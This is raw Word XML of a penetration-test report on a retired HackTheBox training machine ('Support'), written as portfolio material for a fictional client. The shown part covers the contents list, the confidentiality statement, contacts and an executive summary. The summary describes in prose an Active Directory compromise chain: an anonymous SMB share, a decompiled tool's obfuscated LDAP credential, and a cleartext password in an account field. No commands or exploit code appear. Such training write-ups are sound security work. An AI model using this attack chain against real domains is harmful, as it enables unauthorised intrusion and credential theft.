          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55AE26A2" w14:textId="218904A0"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8" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4. Excessive GenericAll ACE on Domain Controller Computer Object — Critical</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206078 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="150CFECE" w14:textId="640E4733" w:rsidR="00F10C23" w:rsidRDefault="00F10C2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79" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendices</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206079 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E97D22B" w14:textId="101D9E99"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0" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix A – Finding Severities</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206080 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11669158" w14:textId="28CA90BE"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1" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix B – Exploited Hosts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206081 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26E288A7" w14:textId="1C0BA8BD"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2" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix C – Compromised Users</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206082 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BA14489" w14:textId="0B3C81A9"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3" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix D – Changes/Host Cleanup</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206083 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54CF1BC0" w14:textId="5C63D3DE" w:rsidR="00F10C23" w:rsidRDefault="00F10C2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4" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix E – CVSS 3.1 Scoring Justification</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206084 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="286888BE" w14:textId="00B7F8D7" w:rsidR="00F10C23" w:rsidRDefault="00F10C23">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5" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Finding 1: Anonymous SMB Share — Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N — Base Score: 5.3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206085 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D529B64" w14:textId="1030B92F" w:rsidR="00F10C23" w:rsidRDefault="00F10C23">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6" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Finding 2: Hardcoded Credentials — Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N — Base Score: 7.5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206086 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75203845" w14:textId="16F4B757" w:rsidR="00F10C23" w:rsidRDefault="00F10C23">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7" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Finding 3: Cleartext Credential in info Attribute — Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N — Base Score: 8.1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206087 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="701BB350" w14:textId="0020AA85" w:rsidR="00F10C23" w:rsidRDefault="00F10C23">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206088" w:history="1">
        <w:r w:rsidRPr="0094752E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Finding 4: Excessive GenericAll ACE — Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H — Base Score: 9.8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233206088 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="081D8662" w14:textId="71BAF4D4" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8663" w14:textId="67761C01" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc233204841"/>
      <w:bookmarkStart w:id="2" w:name="_Toc233206057"/>
      <w:r>
        <w:t>Statement of Confidentiality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="081D8664" w14:textId="7B666FF4" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>he contents of this document have been developed by Rajdeep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sarkar as part of independent offensive security training and portfolio development. This document is considered personal training and portfolio material. This document may not be represented as an official, contracted, or client-engaged penetration test deliverable, as no such engagement took place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8665" w14:textId="67AD13C7" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The contents of this document do not constitute legal advice. The assessment detailed herein was performed against a retired </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HackTheBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> training machine (“Support”) in a sanctioned lab environment, for educational purposes only. The fictional </w:t>
      </w:r>
      <w:r w:rsidR="00073D4B">
        <w:t>client’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> name (“Support Solutions Inc.”) and engagement contacts used in this report are illustrative and used solely to demonstrate professional reporting format and structure. The vulnerabilities described do not affect any real organization’s production infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8666" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8667" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc233206058"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Engagement Contacts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="081D8668" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc233206059"/>
      <w:r>
        <w:t>Support Solutions Contacts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5C3F" w14:paraId="081D86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69" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Primary Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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6A" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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6B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Primary Contact Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D86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6D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[Client Primary Contact]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6E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Chief Technical Officer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6F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cto@support.htb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D8671" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00635C3F">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081D8672" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc233206060"/>
      <w:r>
        <w:t>Assessor Contact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3069"/>
        <w:gridCol w:w="3223"/>
      </w:tblGrid>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D867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73" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessor Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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74" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312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75" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Assessor Contact Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D867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77" w14:textId="667A10E5" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rajdeep</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Sarkar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78" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Security Consultant (Trainee)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79" w14:textId="70CC2B18" w:rsidR="00635C3F" w:rsidRDefault="00CD2A4E">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>rajdeepsarkar</w:t>
            </w:r>
            <w:r w:rsidR="00E22FF4">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>@htbacademy.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D867B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D867C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc233206061"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="081D867D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Support Solutions Inc. (“Support” herein) engaged the assessor to perform an Internal Network Penetration Test of its internally facing Active Directory environment, to identify security weaknesses, determine business impact, document findings in a clear and repeatable manner, and provide remediation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D867E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc233206062"/>
      <w:r>
        <w:t>Approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="081D867F" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Testing was performed under a “black box” approach, without credentials or any advance knowledge of Support’s internal environment, with the goal of identifying unknown weaknesses from the perspective of an unauthenticated attacker who has obtained internal network access (for example, via a compromised guest device or rogue access point). Testing was performed from a non-evasive standpoint with the goal of uncovering as many misconfigurations and vulnerabilities as possible. Each weakness identified was do</w:t>
      </w:r>
      <w:r>
        <w:t>cumented and manually investigated to determine exploitation possibilities and escalation potential. The assessor sought to demonstrate the full impact of every vulnerability, up to and including domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8680" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc233206063"/>
      <w:r>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="081D8681" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The scope of this assessment was the Domain Controller and the SUPPORT.HTB Active Directory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5C3F" w14:paraId="081D868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82" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host/Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="468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83" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D868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85" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.129.11.223 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>dc.support.htb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w: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86" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Support Solutions Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00635C3F" w14:paraId="081D868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88" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>support.htb</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89" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Active Directory Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="081D868B" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:before="60" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table 1: Scope Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D868C" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc233206064"/>
      <w:r>
        <w:t>Assessment Overview and Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="081D868D" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>During the assessment, the assessor identified four (4) findings that threaten the confidentiality, integrity, and availability of Support’s information systems: two (2) High-risk findings, one (1) Medium-risk finding, and one (1) Critical finding. There were no missing-patch vulnerabilities identified; all findings stemmed from misconfiguration and lack of hardening, consistent with weak credential handling and excessive Active Directory permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D868E" w14:textId="77777777" w:rsidR="00635C3F" w:rsidRDefault="00E22FF4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The assessment began with anonymous access to an internal file share, which an unauthenticated attacker can use to retrieve internal tooling. One such tool was found to contain a service account credential protected only by a simple, reversible obfuscation scheme rather than genuine encryption — allowing trivial recovery of valid LDAP credentials with no special tooling beyond a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decompiler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. This credential, in turn, was used to query Active Directory for a separate user account whose password had been mistakenly stored in cleartext within a general-purpose, unrestricted text field on that account — a common but serious misconfiguration. This second credential provided an interactive shell on the domain.</w:t>
      </w:r>
    </w:p>
